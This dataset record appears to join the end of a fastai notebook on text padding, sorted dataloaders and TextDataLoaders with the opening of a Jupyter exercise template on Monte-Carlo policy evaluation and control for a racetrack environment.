"pad_first: tensor([0, 0, 0, 1, 2, 3, 0, 0])\npad_last: tensor([1, 2, 3, 0, 0, 0, 0, 0])\n"
]
],
[
[
"`pad_input_chunk` is the version of `pad_chunk` that works over a list of lists. ",
"_____no_output_____"
]
],
[
[
"#export\n@delegates(pad_chunk)\ndef pad_input_chunk(samples, n_inp=1,**kwargs):\n \"Pad `samples` by adding padding by chunks of size `seq_len`\"\n max_len = max([len(s[n]) for s in samples for n in range(n_inp)])\n padeds = [[pad_chunk(s[n],pad_len=max_len,**kwargs) for n in range(n_inp) ] for s in samples]\n return [(*p, *s[n_inp:]) for p,s in zip(padeds,samples)]",
"_____no_output_____"
]
],
[
[
"The difference with the base `pad_input` is that most of the padding is applied first (if `pad_first=True`) or at the end (if `pad_first=False`) but only by a round multiple of `seq_len`. The rest of the padding is applied to the end (or the beginning if `pad_first=False`). This is to work with `SequenceEncoder` with recurrent models.",
"_____no_output_____"
]
],
[
[
"pad_input_chunk([(TensorText([1,2,3,4,5,6]),TensorText([1,2]),1)], pad_idx=0, seq_len=3,n_inp=2)",
"_____no_output_____"
],
[
"test_eq(pad_input_chunk([(tensor([1,2,3,4,5,6]),1), (tensor([1,2,3]), 2), (tensor([1,2]), 3)], pad_idx=0, seq_len=2), \n [(tensor([1,2,3,4,5,6]),1), (tensor([0,0,1,2,3,0]),2), (tensor([0,0,0,0,1,2]), 3)])\ntest_eq(pad_input_chunk([(tensor([1,2,3,4,5,6]),), (tensor([1,2,3]),), (tensor([1,2]),)], pad_idx=0, seq_len=2), \n [(tensor([1,2,3,4,5,6]),), (tensor([0,0,1,2,3,0]),), (tensor([0,0,0,0,1,2]),)])\ntest_eq(pad_input_chunk([(tensor([1,2,3,4,5,6]),), (tensor([1,2,3]),), (tensor([1,2]),)], pad_idx=0, seq_len=2, pad_first=False), \n [(tensor([1,2,3,4,5,6]),), (tensor([1,2,3,0,0,0]),), (tensor([1,2,0,0,0,0]),)])\n\ntest_eq(pad_input_chunk([(TensorText([1,2,3,4,5,6]),TensorText([1,2]),1)], pad_idx=0, seq_len=2,n_inp=2), \n [(TensorText([1,2,3,4,5,6]),TensorText([0,0,0,0,1,2]),1)])",
"_____no_output_____"
]
],
[
[
"`Transform` version of `pad_input_chunk`. This version supports types, decoding, and the other functionality of `Transform`",
"_____no_output_____"
]
],
[
[
"#export\nclass Pad_Chunk(DisplayedTransform):\n \"Pad `samples` by adding padding by chunks of size `seq_len`\"\n def __init__(self, pad_idx=1, pad_first=True, seq_len=72,decode=True,**kwargs):\n store_attr('pad_idx, pad_first, seq_len,seq_len')\n super().__init__(**kwargs)\n def before_call(self, b):\n \"Set `self.max_len` before encodes\" \n self.max_len = max([x.shape[0] for xs in b for x in xs if isinstance(x,TensorText)])\n def __call__(self, b, **kwargs):\n self.before_call(b)\n return super().__call__(tuple(b), **kwargs)\n def encodes(self, x:TensorText):\n return pad_chunk(x,pad_idx=self.pad_idx, pad_first=self.pad_first, seq_len=self.seq_len, pad_len=self.max_len)\n def decodes(self, o:TensorText):\n return o[o != self.pad_idx] if self.decode else o",
"_____no_output_____"
]
],
[
[
"Here is an example of `Pad_Chunk`",
"_____no_output_____"
]
],
[
[
"pc=Pad_Chunk(pad_idx=0,seq_len=3)\nout=pc([(TensorText([1,2,3,4,5,6]),TensorText([1,2]),1)])\nprint('Inputs: ',*[(TensorText([1,2,3,4,5,6]),TensorText([1,2]),1)])\nprint('Encoded: ',*out)\nprint('Decoded: ',*pc.decode(out))",
"Inputs: (TensorText([1, 2, 3, 4, 5, 6]), TensorText([1, 2]), 1)\nEncoded: (TensorText([1, 2, 3, 4, 5, 6]), TensorText([0, 0, 0, 1, 2, 0]), 1)\nDecoded: (TensorText([1, 2, 3, 4, 5, 6]), TensorText([1, 2]), 1)\n"
],
[
"pc=Pad_Chunk(pad_idx=0, seq_len=2)\ntest_eq(pc([(TensorText([1,2,3,4,5,6]),1), (TensorText([1,2,3]), 2), (TensorText([1,2]), 3)]), \n [(tensor([1,2,3,4,5,6]),1), (tensor([0,0,1,2,3,0]),2), (tensor([0,0,0,0,1,2]), 3)])\n\npc=Pad_Chunk(pad_idx=0, seq_len=2)\ntest_eq(pc([(TensorText([1,2,3,4,5,6]),), (TensorText([1,2,3]),), (TensorText([1,2]),)]), \n [(tensor([1,2,3,4,5,6]),), (tensor([0,0,1,2,3,0]),), (tensor([0,0,0,0,1,2]),)])\n\npc=Pad_Chunk(pad_idx=0, seq_len=2, pad_first=False)\ntest_eq(pc([(TensorText([1,2,3,4,5,6]),), (TensorText([1,2,3]),), (TensorText([1,2]),)]), \n [(tensor([1,2,3,4,5,6]),), (tensor([1,2,3,0,0,0]),), (tensor([1,2,0,0,0,0]),)])\n\npc=Pad_Chunk(pad_idx=0, seq_len=2)\ntest_eq(pc([(TensorText([1,2,3,4,5,6]),TensorText([1,2]),1)]), \n [(TensorText([1,2,3,4,5,6]),TensorText([0,0,0,0,1,2]),1)])",
"_____no_output_____"
],
[
"#export\ndef _default_sort(x): return len(x[0])\n\n@delegates(TfmdDL)\nclass SortedDL(TfmdDL):\n \"A `DataLoader` that goes throught the item in the order given by `sort_func`\"\n def __init__(self, dataset, sort_func=None, res=None, **kwargs):\n super().__init__(dataset, **kwargs)\n self.sort_func = _default_sort if sort_func is None else sort_func\n if res is None and self.sort_func == _default_sort: res = _get_lengths(dataset)\n self.res = [self.sort_func(self.do_item(i)) for i in range_of(self.dataset)] if res is None else res\n if len(self.res) > 0: self.idx_max = np.argmax(self.res)\n\n def get_idxs(self):\n idxs = super().get_idxs()\n if self.shuffle: return idxs\n return sorted(idxs, key=lambda i: self.res[i], reverse=True)\n\n def shuffle_fn(self,idxs):\n idxs = np.random.permutation(len(self.dataset))\n idx_max = np.where(idxs==self.idx_max)[0][0]\n idxs[0],idxs[idx_max] = idxs[idx_max],idxs[0]\n sz = self.bs*50\n chunks = [idxs[i:i+sz] for i in range(0, len(idxs), sz)]\n chunks = [sorted(s, key=lambda i: self.res[i], reverse=True) for s in chunks]\n sort_idx = np.concatenate(chunks)\n\n sz = self.bs\n batches = [sort_idx[i:i+sz] for i in range(0, len(sort_idx), sz)]\n sort_idx = np.concatenate(np.random.permutation(batches[1:-1])) if len(batches) > 2 else np.array([],dtype=np.int)\n sort_idx = np.concatenate((batches[0], sort_idx) if len(batches)==1 else (batches[0], sort_idx, batches[-1]))\n return iter(sort_idx)\n\n @delegates(TfmdDL.new)\n def new(self, dataset=None, **kwargs):\n if 'val_res' in kwargs and kwargs['val_res'] is not None: res = kwargs['val_res']\n else: res = self.res if dataset is None else None\n return super().new(dataset=dataset, res=res, **kwargs)",
"_____no_output_____"
]
],
[
[
"`res` is the result of `sort_func` applied on all elements of the `dataset`. You can pass it if available to make the init much faster by avoiding an initial pass over the whole dataset. For example if sorting by text length (as in the default `sort_func`, called `_default_sort`) you should pass a list with the length of each element in `dataset` to `res` to take advantage of this speed-up. \n\nTo get the same init speed-up for the validation set, `val_res` (a list of text lengths for your validation set) can be passed to the `kwargs` argument of `SortedDL`. Below is an example to reduce the init time by passing a list of text lengths for both the training set and the validation set:\n\n```\n# Pass the training dataset text lengths to SortedDL\nsrtd_dl=partial(SortedDL, res = train_text_lens)\n\n# Pass the validation dataset text lengths \ndl_kwargs = [{},{'val_res': val_text_lens}]\n\n# init our Datasets \ndsets = Datasets(...) \n\n# init our Dataloaders\ndls = dsets.dataloaders(...,dl_type = srtd_dl, dl_kwargs = dl_kwargs)\n```\n\nIf `shuffle` is `True`, this will shuffle a bit the results of the sort to have items of roughly the same size in batches, but not in the exact sorted order.",
"_____no_output_____"
]
],
[
[
"ds = [(tensor([1,2]),1), (tensor([3,4,5,6]),2), (tensor([7]),3), (tensor([8,9,10]),4)]\ndl = SortedDL(ds, bs=2, before_batch=partial(pad_input, pad_idx=0))\ntest_eq(list(dl), [(tensor([[ 3, 4, 5, 6], [ 8, 9, 10, 0]]), tensor([2, 4])), \n (tensor([[1, 2], [7, 0]]), tensor([1, 3]))])",
"_____no_output_____"
],
[
"ds = [(tensor(range(random.randint(1,10))),i) for i in range(101)]\ndl = SortedDL(ds, bs=2, create_batch=partial(pad_input, pad_idx=-1), shuffle=True, num_workers=0)\nbatches = list(dl)\nmax_len = len(batches[0][0])\nfor b in batches: \n assert(len(b[0])) <= max_len \n test_ne(b[0][-1], -1)",
"_____no_output_____"
]
],
[
[
"## TransformBlock for text",
"_____no_output_____"
],
[
"To use the data block API, you will need this build block for texts.",
"_____no_output_____"
]
],
[
[
"#export\nclass TextBlock(TransformBlock):\n \"A `TransformBlock` for texts\"\n @delegates(Numericalize.__init__)\n def __init__(self, tok_tfm, vocab=None, is_lm=False, seq_len=72, backwards=False, **kwargs):\n type_tfms = [tok_tfm, Numericalize(vocab, **kwargs)]\n if backwards: type_tfms += [reverse_text]\n return super().__init__(type_tfms=type_tfms,\n dl_type=LMDataLoader if is_lm else SortedDL,\n dls_kwargs={'seq_len': seq_len} if is_lm else {'before_batch': Pad_Chunk(seq_len=seq_len)})\n\n @classmethod\n @delegates(Tokenizer.from_df, keep=True)\n def from_df(cls, text_cols, vocab=None, is_lm=False, seq_len=72, backwards=False, min_freq=3, max_vocab=60000, **kwargs):\n \"Build a `TextBlock` from a dataframe using `text_cols`\"\n return cls(Tokenizer.from_df(text_cols, **kwargs), vocab=vocab, is_lm=is_lm, seq_len=seq_len,\n backwards=backwards, min_freq=min_freq, max_vocab=max_vocab)\n\n @classmethod\n @delegates(Tokenizer.from_folder, keep=True)\n def from_folder(cls, path, vocab=None, is_lm=False, seq_len=72, backwards=False, min_freq=3, max_vocab=60000, **kwargs):\n \"Build a `TextBlock` from a `path`\"\n return cls(Tokenizer.from_folder(path, **kwargs), vocab=vocab, is_lm=is_lm, seq_len=seq_len,\n backwards=backwards, min_freq=min_freq, max_vocab=max_vocab)",
"_____no_output_____"
]
],
[
[
"For efficient tokenization, you probably want to use one of the factory methods. Otherwise, you can pass your custom `tok_tfm` that will deal with tokenization (if your texts are already tokenized, you can pass `noop`), a `vocab`, or leave it to be inferred on the texts using `min_freq` and `max_vocab`.\n\n`is_lm` indicates if we want to use texts for language modeling or another task, `seq_len` is only necessary to tune if `is_lm=False`, and is passed along to `pad_input_chunk`.",
"_____no_output_____"
]
],
[
[
"show_doc(TextBlock.from_df)",
"_____no_output_____"
]
],
[
[
"Here is an example using a sample of IMDB stored as a CSV file:",
"_____no_output_____"
]
],
[
[
"path = untar_data(URLs.IMDB_SAMPLE)\ndf = pd.read_csv(path/'texts.csv')\n\nimdb_clas = DataBlock(\n blocks=(TextBlock.from_df('text', seq_len=72), CategoryBlock),\n get_x=ColReader('text'), get_y=ColReader('label'), splitter=ColSplitter())\n\ndls = imdb_clas.dataloaders(df, bs=64)\ndls.show_batch(max_n=2)",
"_____no_output_____"
]
],
[
[
"`vocab`, `is_lm`, `seq_len`, `min_freq` and `max_vocab` are passed to the main init, the other argument to `Tokenizer.from_df`.",
"_____no_output_____"
]
],
[
[
"show_doc(TextBlock.from_folder)",
"_____no_output_____"
]
],
[
[
"`vocab`, `is_lm`, `seq_len`, `min_freq` and `max_vocab` are passed to the main init, the other argument to `Tokenizer.from_folder`.",
"_____no_output_____"
],
[
"## TextDataLoaders -",
"_____no_output_____"
]
],
[
[
"#export\nclass TextDataLoaders(DataLoaders):\n \"Basic wrapper around several `DataLoader`s with factory methods for NLP problems\"\n @classmethod\n @delegates(DataLoaders.from_dblock)\n def from_folder(cls, path, train='train', valid='valid', valid_pct=None, seed=None, vocab=None, text_vocab=None, is_lm=False,\n tok_tfm=None, seq_len=72, backwards=False, **kwargs):\n \"Create from imagenet style dataset in `path` with `train` and `valid` subfolders (or provide `valid_pct`)\"\n splitter = GrandparentSplitter(train_name=train, valid_name=valid) if valid_pct is None else RandomSplitter(valid_pct, seed=seed)\n blocks = [TextBlock.from_folder(path, text_vocab, is_lm, seq_len, backwards) if tok_tfm is None else TextBlock(tok_tfm, text_vocab, is_lm, seq_len, backwards)]\n if not is_lm: blocks.append(CategoryBlock(vocab=vocab))\n get_items = partial(get_text_files, folders=[train,valid]) if valid_pct is None else get_text_files\n dblock = DataBlock(blocks=blocks,\n get_items=get_items,\n splitter=splitter,\n get_y=None if is_lm else parent_label)\n return cls.from_dblock(dblock, path, path=path, seq_len=seq_len, **kwargs)\n\n @classmethod\n @delegates(DataLoaders.from_dblock)\n def from_df(cls, df, path='.', valid_pct=0.2, seed=None, text_col=0, label_col=1, label_delim=None, y_block=None,\n text_vocab=None, is_lm=False, valid_col=None, tok_tfm=None, tok_text_col=\"text\", seq_len=72, backwards=False, **kwargs):\n \"Create from `df` in `path` with `valid_pct`\"\n blocks = [TextBlock.from_df(text_col, text_vocab, is_lm, seq_len, backwards) if tok_tfm is None else TextBlock(tok_tfm, text_vocab, is_lm, seq_len, backwards)]\n if y_block is None and not is_lm:\n blocks.append(MultiCategoryBlock if is_listy(label_col) and len(label_col) > 1 else CategoryBlock)\n if y_block is not None and not is_lm: blocks += (y_block if is_listy(y_block) else [y_block])\n splitter = RandomSplitter(valid_pct, seed=seed) if valid_col is None else ColSplitter(valid_col)\n dblock = DataBlock(blocks=blocks,\n get_x=ColReader(tok_text_col),\n get_y=None if is_lm else ColReader(label_col, label_delim=label_delim),\n splitter=splitter)\n return cls.from_dblock(dblock, df, path=path, seq_len=seq_len, **kwargs)\n\n @classmethod\n def from_csv(cls, path, csv_fname='labels.csv', header='infer', delimiter=None, **kwargs):\n \"Create from `csv` file in `path/csv_fname`\"\n df = pd.read_csv(Path(path)/csv_fname, header=header, delimiter=delimiter)\n return cls.from_df(df, path=path, **kwargs)\n\nTextDataLoaders.from_csv = delegates(to=TextDataLoaders.from_df)(TextDataLoaders.from_csv)",
"_____no_output_____"
],
[
"show_doc(TextDataLoaders, title_level=2)",
"_____no_output_____"
]
],
[
[
"You should not use the init directly but one of the following factory methods. All those factory methods accept as arguments:\n\n- `text_vocab`: the vocabulary used for numericalizing texts (if not passed, it's inferred from the data)\n- `tok_tfm`: if passed, uses this `tok_tfm` instead of the default\n- `seq_len`: the sequence length used for batch\n- `bs`: the batch size\n- `val_bs`: the batch size for the validation `DataLoader` (defaults to `bs`)\n- `shuffle_train`: if we shuffle the training `DataLoader` or not\n- `device`: the PyTorch device to use (defaults to `default_device()`)",
"_____no_output_____"
]
],
[
[
"show_doc(TextDataLoaders.from_folder)",
"_____no_output_____"
]
],
[
[
"If `valid_pct` is provided, a random split is performed (with an optional `seed`) by setting aside that percentage of the data for the validation set (instead of looking at the grandparents folder). If a `vocab` is passed, only the folders with names in `vocab` are kept.\n\nHere is an example on a sample of the IMDB movie review dataset:",
"_____no_output_____"
]
],
[
[
"#slow\npath = untar_data(URLs.IMDB)\ndls = TextDataLoaders.from_folder(path)\ndls.show_batch(max_n=3)",
"_____no_output_____"
],
[
"show_doc(TextDataLoaders.from_df)",
"_____no_output_____"
]
],
[
[
"`seed` can optionally be passed for reproducibility. `text_col`, `label_col` and optionally `valid_col` are indices or names of columns for texts/labels and the validation flag. `label_delim` can be passed for a multi-label problem if your labels are in one column, separated by a particular char. `y_block` should be passed to indicate your type of targets, in case the library did no infer it properly.\n\nAlong with this, you can specify the specific column the tokenized text are sent to with `tok_text_col`. By default they are stored in a column named `text` after tokenizing. \n\nHere are examples on subsets of IMDB:",
"_____no_output_____"
]
],
[
[
"path = untar_data(URLs.IMDB_SAMPLE)",
"_____no_output_____"
],
[
"df = pd.read_csv(path/\"texts.csv\"); df.head()",
"_____no_output_____"
],
[
"#hide\npath = untar_data(URLs.IMDB_SAMPLE)\ndf = pd.read_csv(path/\"texts.csv\")\ndf.columns = ['label', 'text_col', 'is_valid'] # to test tok_text_col is working properly\ndls = TextDataLoaders.from_df(df, path=path, text_col='text_col', label_col='label', valid_col='is_valid')\ndl = dls.test_dl([\"This movie was bad\"])\nx, = dl.one_batch()\ntest_eq(x.cpu(), TensorText([[2,8,21,29,25,97]]))",
"_____no_output_____"
],
[
"path = untar_data(URLs.IMDB_SAMPLE)\ndls = TextDataLoaders.from_df(df, path=path, text_col='text', label_col='label', valid_col='is_valid')\ndls.show_batch(max_n=3)",
"_____no_output_____"
],
[
"dls = TextDataLoaders.from_df(df, path=path, text_col='text', is_lm=True, valid_col='is_valid')\ndls.show_batch(max_n=3)",
"_____no_output_____"
],
[
"show_doc(TextDataLoaders.from_csv)",
"_____no_output_____"
]
],
[
[
"Opens the csv file with `header` and `delimiter`, then pass all the other arguments to `TextDataLoaders.from_df`.",
"_____no_output_____"
]
],
[
[
"dls = TextDataLoaders.from_csv(path=path, csv_fname='texts.csv', text_col='text', label_col='label', valid_col='is_valid')\ndls.show_batch(max_n=3)",
"_____no_output_____"
]
],
[
[
"## Export -",
"_____no_output_____"
]
],
[
[
"#hide\nfrom nbdev.export import notebook2script\nnotebook2script()",
"Converted 00_torch_core.ipynb.\nConverted 01_layers.ipynb.\nConverted 01a_losses.ipynb.\nConverted 02_data.load.ipynb.\nConverted 03_data.core.ipynb.\nConverted 04_data.external.ipynb.\nConverted 05_data.transforms.ipynb.\nConverted 06_data.block.ipynb.\nConverted 07_vision.core.ipynb.\nConverted 08_vision.data.ipynb.\nConverted 09_vision.augment.ipynb.\nConverted 09b_vision.utils.ipynb.\nConverted 09c_vision.widgets.ipynb.\nConverted 10_tutorial.pets.ipynb.\nConverted 10b_tutorial.albumentations.ipynb.\nConverted 11_vision.models.xresnet.ipynb.\nConverted 12_optimizer.ipynb.\nConverted 13_callback.core.ipynb.\nConverted 13a_learner.ipynb.\nConverted 13b_metrics.ipynb.\nConverted 14_callback.schedule.ipynb.\nConverted 14a_callback.data.ipynb.\nConverted 15_callback.hook.ipynb.\nConverted 15a_vision.models.unet.ipynb.\nConverted 16_callback.progress.ipynb.\nConverted 17_callback.tracker.ipynb.\nConverted 18_callback.fp16.ipynb.\nConverted 18a_callback.training.ipynb.\nConverted 18b_callback.preds.ipynb.\nConverted 19_callback.mixup.ipynb.\nConverted 20_interpret.ipynb.\nConverted 20a_distributed.ipynb.\nConverted 21_vision.learner.ipynb.\nConverted 22_tutorial.imagenette.ipynb.\nConverted 23_tutorial.vision.ipynb.\nConverted 24_tutorial.siamese.ipynb.\nConverted 24_vision.gan.ipynb.\nConverted 30_text.core.ipynb.\nConverted 31_text.data.ipynb.\nConverted 32_text.models.awdlstm.ipynb.\nConverted 33_text.models.core.ipynb.\nConverted 34_callback.rnn.ipynb.\nConverted 35_tutorial.wikitext.ipynb.\nConverted 36_text.models.qrnn.ipynb.\nConverted 37_text.learner.ipynb.\nConverted 38_tutorial.text.ipynb.\nConverted 39_tutorial.transformers.ipynb.\nConverted 40_tabular.core.ipynb.\nConverted 41_tabular.data.ipynb.\nConverted 42_tabular.model.ipynb.\nConverted 43_tabular.learner.ipynb.\nConverted 44_tutorial.tabular.ipynb.\nConverted 45_collab.ipynb.\nConverted 46_tutorial.collab.ipynb.\nConverted 50_tutorial.datablock.ipynb.\nConverted 60_medical.imaging.ipynb.\nConverted 61_tutorial.medical_imaging.ipynb.\nConverted 65_medical.text.ipynb.\nConverted 70_callback.wandb.ipynb.\nConverted 71_callback.tensorboard.ipynb.\nConverted 72_callback.neptune.ipynb.\nConverted 73_callback.captum.ipynb.\nConverted 74_callback.azureml.ipynb.\nConverted 97_test_utils.ipynb.\nConverted 99_pytorch_doc.ipynb.\nConverted dev-setup.ipynb.\nConverted index.ipynb.\nConverted quick_start.ipynb.\nConverted tutorial.ipynb.\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e707a4543e920c14136483828aeb8095fcf3e295 | 32,184 | ipynb | Jupyter Notebook | exercises/templates/ex04/Monte-Carlo_Methods.ipynb | adilsheraz/reinforcement_learning_course_materials | e086ae7dcee2a0c1dbb329c2b25cf583c339c75a | [
"MIT"
] | 557 | 2020-07-20T08:38:15.000Z | 2022-03-31T19:30:35.000Z | exercises/templates/ex04/Monte-Carlo_Methods.ipynb | BochraCHEMAM/reinforcement_learning_course_materials | 09a211da5707ba61cd653ab9f2a899b08357d6a3 | [
"MIT"
] | 7 | 2020-07-22T07:27:55.000Z | 2021-05-12T14:37:08.000Z | exercises/templates/ex04/Monte-Carlo_Methods.ipynb | BochraCHEMAM/reinforcement_learning_course_materials | 09a211da5707ba61cd653ab9f2a899b08357d6a3 | [
"MIT"
] | 115 | 2020-09-08T17:12:25.000Z | 2022-03-31T18:13:08.000Z | 30.709924 | 410 | 0.567922 | [
[
[
"# Exercise 04): Monte-Carlo Methods\n\nIn this exercise we make use of the racetrack environment (racetrack_environment.py) to test Monte-Carlo methods.\n\nThe racetrack environment is based on the OpenAI Gym interface (https://gym.openai.com/) depicted in the picture below.\n\n\n\n(Source: Wiki, https://www.vecteezy.com/free-vector/car)\n\nThe agent can send an action to the system - our racetrack env - using the `env.step(action)` function to drive the car in the environment which is given by the following racetrack: \n\n\n\nHere, the red line represents the start line and the goal is to move the car within the yellow course to the white finish line without hitting the wall. \nIf the car hits the wall, it will be reset to the start line. \nThe information we get from the step function of the environment are\n- state consisting of the y- and x-postion (`p_y` and `p_x`) and the velocity in x- and y-direction (`v_y` and `v_x`),\n- `reward`, which will be -1 per step,\n- `done`-flag which indicates if the environment is terminated (in our case if the car has reached the finish line),\n- info (addioninal information, not used here).\n\nOur possible actions are to accelerate the car into x- and/or y-direction (positiv or negativ) or do nothing.\n\nAccelerate the car will result in chaning the velocity of the car as follows:\n\n\nBreaking the car will result in chaning the velocity of the car as follows:\n\n\nOur possible action-space is therefore `[-1, 0, 1]` which are availabe as tuple or integer number and encoded as exmplained later on.\n\nActions (accelerations in given directions) are encoded according from integer (`a`) to tuple (`a_y`, `a_x`) using the follwoing equations:\n\n- `a_y = a//3-1`\n- `a_x = a%3-1`\n\nThis is shown in the following diagram:\n\n\n\nPlease make yourself more familiar with the used environment (racetrack_environment.py) for more informations.",
"_____no_output_____"
],
[
"For the start, please execute the following cells.\n",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport random\nimport sys\nfrom racetrack_environment import RaceTrackEnv\nimport matplotlib.pyplot as plt\nfrom tqdm.notebook import tqdm\nplt.style.use('dark_background')",
"_____no_output_____"
]
],
[
[
"Execute the follwoing cell to built a race track using the `RaceTrackEnv` as a test scenario. ",
"_____no_output_____"
]
],
[
[
"# Build the course\n_course_dim = (8, 10)\n_inner_wall_dim = (2, 6)\n\ndef build_uturn_course(course_dim, inner_wall_dim):\n \"\"\"\n Build a race track for the u-turn street scenario.\n Start and finish line are placed in the center top and bottom respectively. The course dimension specifications\n do not consider a bounding wall around the track, which is inserted additionally. \n\n \"\"\"\n track = []\n wall_up_bound = course_dim[0]//2 - inner_wall_dim[0] // 2\n wall_bottom_bound = course_dim[0]//2 + inner_wall_dim[0]//2\n street_width = course_dim[1]//2 - inner_wall_dim[1]//2\n # construct course line by line\n for i in range(course_dim[0]):\n if i < wall_up_bound:\n half_street_len = course_dim[1]//2 - 1\n track_row = 'W'*(half_street_len//2+1) + 'W-' + 'o'*(half_street_len-1+half_street_len//2)\n elif wall_up_bound <= i < wall_bottom_bound:\n track_row = 'W'*street_width + 'W'*inner_wall_dim[1] + 'o'*street_width\n else:\n track_row = 'W'*(half_street_len//2+1) + 'W+' + 'o'*(half_street_len-1+half_street_len//2)\n track.append(track_row)\n # add boundary\n track = ['W'*course_dim[1]] + track + ['W'*course_dim[1]]\n track = ['W'+s+'W' for s in track]\n return track\n \ncourse = build_uturn_course(_course_dim, _inner_wall_dim)\ntrack = RaceTrackEnv(course)\nfor row in course:\n print(row)\n \npos_map = track.course # overlay track course\nplt.imshow(pos_map, cmap='hot', interpolation='nearest')\nplt.show()",
"_____no_output_____"
]
],
[
[
"## 1) Monte-Carlo-Based Policy Evaluation",
"_____no_output_____"
],
[
"Write a first-visit Monte-Carlo algorithm to evaluate the dummy policy as defined below on the U-turn course. The dummy policy turns the car to the right as soon as it stands in front of a wall. Try to understand how the policy works before you start to code. \n\nHow can we interprete the state values resulting from the evaluation with first-visit Monte-Carlo?",
"_____no_output_____"
],
[
"## 1) Solution",
"_____no_output_____"
],
[
"Algorithm given below.\n\nThe simple and deterministic dummy policy will always guarantee the car to reach the finish line. Thus, the state values can be interpreted as the number of timesteps that is necessary to reach the goal from that specific state (i.e. position and velocity) if we are following the policy.",
"_____no_output_____"
]
],
[
[
"### Select course and initialize dummy policy\n\ncourse = build_uturn_course(_course_dim, _inner_wall_dim)\ntrack = RaceTrackEnv(course)\ndummy_slow_pi = np.ones([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY]) * 4 \n\ndummy_slow_pi[:track.bounds[0]//2, :, 0 , 0] = 5 # go right\ndummy_slow_pi[:track.bounds[0]//2, -2:, 0 , :] = 6 # go bottom left\ndummy_slow_pi[-2:, track.bounds[1]//2:, : , 0] = 0 # go top left\n\npi = dummy_slow_pi",
"_____no_output_____"
],
[
"# initialize the value function\nvalues = np.zeros([track.bounds[0], track.bounds[1], 1+2*track.MAX_VELOCITY, 1+2*track.MAX_VELOCITY])\n\n# initialize an empty dict to count the number of visits\nn_dict = {}\n\n# configuration parameters\ngamma = 1 # discount factor\nno_episodes = 500 # number of evaluated episodes\nno_steps = 2000 # number of allowed timesteps per episode\n\nfor e in tqdm(range(no_episodes), position=0, leave=True):\n \n # initialize variables in which collected data will be stored\n states = [] # list of tuples\n rewards = [] # list of floats\n visited_states = set() # set of tuples\n first_visit_list = [] # list of booleans\n \n # YOUR CODE HERE\n raise NotImplementedError()\n",
"_____no_output_____"
]
],
[
[
"To visualize the result of the evaluation, plot the state values as a function of **position only** (so that you get a two dimensional representation of the state value) and in the form of a tabular represenation and a heatmap. In order to omit dependence of the velocity dimensions, use the minimum of the value function with respect to the velocities.",
"_____no_output_____"
]
],
[
[
"def text_print_pos_map(_pos_map):\n for row in _pos_map:\n print(' '.join(x_size*['{}']).format(*[str(int(r)).zfill(3) for r in row]))\n \ndef plot_pos_map(_pos_map):\n plt.imshow(_pos_map, cmap='hot', interpolation='nearest')\n plt.show()\n\n# calculate minimum value with respect to velocities\nx_size, y_size = len(course[0]), len(course)\npos_map = np.zeros((y_size, x_size))\n\nfor s_x in range(x_size):\n for s_y in range(y_size):\n pos_map[s_y, s_x] = np.min(values[s_y, s_x, :, :])\n \ntext_print_pos_map(pos_map)\nplot_pos_map(-pos_map)",
"_____no_output_____"
]
],
[
[
"## 2) On-Policy $\\varepsilon$-Greedy Control",
"_____no_output_____"
],
[
"Starting with the previously used turn-right-if-wall dummy policy, write an on-policy Monte-Carlo based first-visit $\\varepsilon$-greedy control algorithm to solve the U-turn course. The policy is now stochastic: it does not contain simple action commands for each state, but probabilities for each possible action. Again, please make sure to understand how the stochastic policy works before coding.\n\n\nMake sure to implement an upper bound for episode length (we suggest a boundary of 200 steps). Why do we need a bound like this? What happens to the state values / state-action values if we increase the bound?",
"_____no_output_____"
],
[
"## 2) Solution",
"_____no_output_____"
],
[
"YOUR ANSWER HERE",
"_____no_output_____"
]
],
[
[
